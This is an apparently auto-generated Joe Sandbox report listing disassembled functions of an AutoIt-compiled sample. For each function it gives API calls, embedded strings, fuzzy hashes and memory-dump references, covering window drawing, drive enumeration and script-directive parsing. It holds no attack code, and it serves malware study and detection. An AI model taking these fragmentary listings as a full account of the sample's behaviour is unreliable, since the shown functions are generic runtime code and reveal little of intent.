Opcode Fuzzy Hash: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
Instruction Fuzzy Hash: A9D05E3226050EAFEF01CEA4DC01EAF3B69EB04B01F408111FE15D50A1C775D836AB60

Function 009AA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 009AA12A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
Instruction ID: 1ab9c6ae98f72a329442e2f0cd775c7ebba47b5d486f32042c2139192b5e40ba
Opcode Fuzzy Hash: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
Instruction Fuzzy Hash: 3CA0123000410CABCA001B81EC044447F5CD6002A07004020F40C44421873254124581

Function 00998808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
Instruction ID: 361a4b0eefca7810a32342d0946e3545ec0dc05a1b49fd882ad495da0e68f2da
Opcode Fuzzy Hash: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
Instruction Fuzzy Hash: BE224430904506CBDF288A6CC49477EB7A9FB02344F39886FE9568B692DB34DD91CB51

Function 009A21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 553ade78f5d6837990e1c5993ffc4286a2cf5379b23bb6bf46b9eee2cb8958ce
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 29C195322091A30ADF2D473D843413EFAA55FA37B171A175ED8B3DB1D4EE14C925D6A0

Function 009A25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 7b1f442076efa81ab3e93ecafc43eb7ee474a7c4234ad98668d3c290e91a96cc
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 78C193322051A30ADF6D473EC43403EBAA55FA37B131A076EE4B3DB1D4EE24D925D6A0

Function 009A1D90 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: cc907f25bafb1262ffa38bb50ac26812b77d9759d5d071d35dcb60647fd565aa
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: FCC184322091A30ADF2D463EC43403EFAA55FA37B171A076ED8B3DB1D4EE14C965D6A0

Function 009A1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 24430b4fd1d0114f1198a8a6922598af750c6e0664a53a7e9af7e6be3a6634fb
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8CC181322091A309DF2D463AC43413EBAA95FA37B171A176ED4B3DB1D4EE20C925D6A0

Function 009F7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009F785B
DeleteObject.GDI32(00000000), ref: 009F786D
DestroyWindow.USER32 ref: 009F787B
GetDesktopWindow.USER32 ref: 009F7895
GetWindowRect.USER32(00000000), ref: 009F789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009F79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009F79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A35
GetClientRect.USER32(00000000,?), ref: 009F7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009F7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7ABB
GlobalLock.KERNEL32(00000000), ref: 009F7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AD3
GlobalUnlock.KERNEL32(00000000), ref: 009F7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AE3
GlobalFree.KERNEL32(00000000), ref: 009F7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A12CAC,00000000), ref: 009F7B16
GlobalFree.KERNEL32(00000000), ref: 009F7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009F7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009F7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7D7A

Strings

AutoIt v3, xrefs: 009F7A2D
DISPLAY, xrefs: 009F7BDD
static, xrefs: 009F7A75, 009F7BCC
, xrefs: 009F7D00

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 3c1609bbdd280a069cbf97b588836562cb531db8e5b045ee34ba2a73c43941ef
Instruction ID: 16d7c763a30e7972686c4cab6ad3d87278f8d5a0328d4331993567d832f55d3e
Opcode Fuzzy Hash: 3c1609bbdd280a069cbf97b588836562cb531db8e5b045ee34ba2a73c43941ef
Instruction Fuzzy Hash: 51027B75900109EFDB14DFA4DC89EAEBBB9FF49310F048159F915AB2A1CB71AD02CB60

Function 00A0356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00A0F910), ref: 00A03627
IsWindowVisible.USER32(?), ref: 00A0364B

Strings

ISENABLED, xrefs: 00A0366B
CURRENTTAB, xrefs: 00A036BD
UNCHECK, xrefs: 00A03883
SHOWDROPDOWN, xrefs: 00A036E0
GETCURRENTLINE, xrefs: 00A038ED
SETCURRENTSELECTION, xrefs: 00A037B6
TABRIGHT, xrefs: 00A0369D
SENDCOMMANDID, xrefs: 00A039DA
GETLINECOUNT, xrefs: 00A038C6
EDITPASTE, xrefs: 00A0395F
GETLINE, xrefs: 00A0399B
HIDEDROPDOWN, xrefs: 00A03700
SELECTSTRING, xrefs: 00A03806
CHECK, xrefs: 00A0386D
FINDSTRING, xrefs: 00A03776
ISCHECKED, xrefs: 00A03839
GETCURRENTCOL, xrefs: 00A03928
GETSELECTED, xrefs: 00A038A3
DELSTRING, xrefs: 00A03749
ADDSTRING, xrefs: 00A03716
ISVISIBLE, xrefs: 00A03637
TABLEFT, xrefs: 00A03687
GETCURRENTSELECTION, xrefs: 00A037E3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 2023ab42c7d38723a873458d6b11b6030a29c7669afd18d4f2cafdd98c9d1728
Instruction ID: 83d60f808169f35ec016abacd1d9fa03d2793788e1e2c67cebe434c0b08dfc43
Opcode Fuzzy Hash: 2023ab42c7d38723a873458d6b11b6030a29c7669afd18d4f2cafdd98c9d1728
Instruction Fuzzy Hash: 0ED14D312043059FCF04EF10D856B6E7BA9AFD5394F188459F8865B3E2DB61EE4ACB81

Function 00A0A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A0A630
GetSysColorBrush.USER32(0000000F), ref: 00A0A661
GetSysColor.USER32(0000000F), ref: 00A0A66D
SetBkColor.GDI32(?,000000FF), ref: 00A0A687
SelectObject.GDI32(?,00000000), ref: 00A0A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A6C1
GetSysColor.USER32(00000010), ref: 00A0A6C9
CreateSolidBrush.GDI32(00000000), ref: 00A0A6D0
FrameRect.USER32(?,?,00000000), ref: 00A0A6DF
DeleteObject.GDI32(00000000), ref: 00A0A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00A0A731
FillRect.USER32(?,?,00000000), ref: 00A0A763
GetWindowLongW.USER32(?,000000F0), ref: 00A0A78E

Part of subcall function 00A0A8CA: GetSysColor.USER32(00000012), ref: 00A0A903
Part of subcall function 00A0A8CA: SetTextColor.GDI32(?,?), ref: 00A0A907
Part of subcall function 00A0A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
Part of subcall function 00A0A8CA: GetSysColor.USER32(0000000F), ref: 00A0A928
Part of subcall function 00A0A8CA: GetSysColor.USER32(00000011), ref: 00A0A945
Part of subcall function 00A0A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
Part of subcall function 00A0A8CA: SelectObject.GDI32(?,00000000), ref: 00A0A964
Part of subcall function 00A0A8CA: SetBkColor.GDI32(?,00000000), ref: 00A0A96D
Part of subcall function 00A0A8CA: SelectObject.GDI32(?,?), ref: 00A0A97A
Part of subcall function 00A0A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
Part of subcall function 00A0A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
Part of subcall function 00A0A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
Part of subcall function 00A0A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: b4209af72e0ee270de6e8dd5d399ffb868f0a0d1f1c0af2a07b56c8919f88f72
Instruction ID: 0aac49e9faa7a8190f75e6694d562c54e3dcb47af443fd1b49b3788ab2003e7b
Opcode Fuzzy Hash: b4209af72e0ee270de6e8dd5d399ffb868f0a0d1f1c0af2a07b56c8919f88f72
Instruction Fuzzy Hash: 67917072408309EFC720DFA4DC08A5B7BB9FB89321F104B29F952A61E1D771D946CB52

Function 00982C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00982CA2
DeleteObject.GDI32(00000000), ref: 00982CE8
DeleteObject.GDI32(00000000), ref: 00982CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00982CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00982D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 009BC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009BC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009BC89D

Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A

SendMessageW.USER32(?,00001053), ref: 009BC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009BC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC912

Strings

0, xrefs: 009BC731

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 2d330984af66e54b2a121778497d5b22fbb9ea21a88140f621dc4ae20a996545
Instruction ID: e039ec35075af7161d324f685a0f9249b4054b186872d255bfe7d6ad0aa4fb0a
Opcode Fuzzy Hash: 2d330984af66e54b2a121778497d5b22fbb9ea21a88140f621dc4ae20a996545
Instruction Fuzzy Hash: 9D1290B0604201EFDB25DF24C984BA9B7E9FF45320F5445A9F896DB662CB31EC42CB91

Function 009F74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009F74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009F759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009F75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009F75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009F7633
GetClientRect.USER32(00000000,?), ref: 009F763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009F7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009F7692
GetStockObject.GDI32(00000011), ref: 009F76A2
SelectObject.GDI32(00000000,00000000), ref: 009F76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009F76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F76BF
DeleteDC.GDI32(00000000), ref: 009F76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009F76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 009F770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009F7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009F775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 009F776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009F779B
GetStockObject.GDI32(00000011), ref: 009F77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009F77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009F77BB

Strings

AutoIt v3, xrefs: 009F762B
DISPLAY, xrefs: 009F7688
msctls_progress32, xrefs: 009F773C
static, xrefs: 009F767D, 009F7795

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
Instruction ID: 98a0cd0db0c2431d9abc22d3626176894a3ab60f4162d2372192e92e0902997a
Opcode Fuzzy Hash: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
Instruction Fuzzy Hash: 23A17075A40609BFEB14DBA4DC4AFBEBBB9EB45710F004115FA14A72E1D7B1AD02CB60

Function 009EAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EAD1E
GetDriveTypeW.KERNEL32(?,00A0FAC0,?,\\.\,00A0F910), ref: 009EADFB
SetErrorMode.KERNEL32(00000000,00A0FAC0,?,\\.\,00A0F910), ref: 009EAF59

Strings

Unknown, xrefs: 009EAE1B, 009EAEBF
CDROM, xrefs: 009EAE2F
RAID, xrefs: 009EAEF7
RAMDisk, xrefs: 009EAE25
SSA, xrefs: 009EAEE2
Removable, xrefs: 009EAE4D
Virtual, xrefs: 009EAF21
PhysicalDrive, xrefs: 009EADA7
SATA, xrefs: 009EAF0C
\\.\, xrefs: 009EAD70
Network, xrefs: 009EAE39
SAS, xrefs: 009EAF05
ATAPI, xrefs: 009EAECD
SSD, xrefs: 009EAE86
Fibre, xrefs: 009EAEE9
ATA, xrefs: 009EAED4
1394, xrefs: 009EAEDB
USB, xrefs: 009EAEF0
SCSI, xrefs: 009EAEC6
iSCSI, xrefs: 009EAEFE
Fixed, xrefs: 009EAE43
FileBackedVirtual, xrefs: 009EAF28
MMC, xrefs: 009EAF1A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 811e0c3a67aaefd73832ebeac0881ce472b2ef484d6aa51a42e967aca020a9f7
Instruction ID: cddde1eb586f512a1d62abba406f131001a07273aaa32d173fc7c81d704930f5
Opcode Fuzzy Hash: 811e0c3a67aaefd73832ebeac0881ce472b2ef484d6aa51a42e967aca020a9f7
Instruction Fuzzy Hash: 4051B1B0648245ABCB12EB52C982DBDB3A4FF4C700B608D56F407A72B1CA39BD41DB52

Function 009868DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00986931
__wcsnicmp.LIBCMT ref: 00986949
__wcsnicmp.LIBCMT ref: 00986961
__wcsnicmp.LIBCMT ref: 00986979
__wcsnicmp.LIBCMT ref: 00986991
__wcsnicmp.LIBCMT ref: 009869A9
__wcsnicmp.LIBCMT ref: 009869C1
__wcsnicmp.LIBCMT ref: 009869D5
__wcsnicmp.LIBCMT ref: 00986A16
__wcsnicmp.LIBCMT ref: 00986A2A
__wcsnicmp.LIBCMT ref: 00986A3E
__wcsnicmp.LIBCMT ref: 00986A52

Strings

Bad directive syntax error, xrefs: 009BE31A
#notrayicon, xrefs: 00986943
#include-once, xrefs: 0098698B
Unterminated group of comments, xrefs: 009BE403
#cs, xrefs: 009869CF, 00986A24
#OnAutoItStartRegister, xrefs: 00986973
Cannot parse #include, xrefs: 009BE3F0
#pragma compile, xrefs: 0098692B
#include, xrefs: 009869A3
#requireadmin, xrefs: 0098695B
#comments-end, xrefs: 00986A38
#comments-start, xrefs: 009869BB, 00986A10
#ce, xrefs: 00986A4C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 54cef584733e256214d554017dbf9c3d6c7a5f1a0e708cdee304a857b7413331
Instruction ID: d938252e6af64d236c6a9b93db7196b190d229efd8ad823227f931df8caf1175
Opcode Fuzzy Hash: 54cef584733e256214d554017dbf9c3d6c7a5f1a0e708cdee304a857b7413331
